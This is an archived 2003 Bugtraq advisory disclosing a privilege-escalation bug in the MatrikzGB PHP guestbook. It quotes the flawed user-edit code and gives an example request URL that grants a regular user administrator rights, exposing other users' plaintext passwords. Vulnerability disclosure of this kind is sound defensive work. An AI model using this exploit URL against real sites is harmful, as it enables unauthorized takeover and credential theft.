Security hole in MatrikzGB

From: Stephan S. (mastamorphixx_at_web.de)
Date: 08/16/03

  • Next message: Balwinder Singh: "Re: Need help. Proof of concept 100% security." 
    Date: 16 Aug 2003 01:51:49 -0000
To: bugtraq@securityfocus.com
    ('binary' encoding is not supported, stored as-is)

    Security hole in MatrikzGB Guestbook
    15/8/2003
     
    Vulnerable Versions:
    Version 2.0 and prior
    Version 3 (not tested)
     
    Summary:
    MatrikzGB was written by Thomas Hempel for
    www.onsite.org.
    A bug in index.php allows a user with a regular user
    account to give administrator rights to himself.
     
    Details:
    The bug is in the user edit function:
    Every regular user is allowed to chanche rights or do any
    modifications on existing users.
     if ($new_username != "" && $new_password != "") {
    create_user($new_username,$new_password,$new_rights,$entry_index);
    echo "<tr><th class=\"ok\">Der Benutzer wurde angelegt!";
     
    Example:
    This is a example how to give administrator rights to
    yourself.
    http://www.target.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass
     
    Comment:
    When you got administrator rights,you can look up the
    passwords of all other users,they are in plaintext.
     
    Vendor status:
    Vendor has been contacted.
     
    by Stephan "mastamorphixx" S. ,member of
    www.lostkey.org
    contact:mastamorphixx@web.de
    irc.euirc.de #lostkey
     

  • Next message: Balwinder Singh: "Re: Need help. Proof of concept 100% security."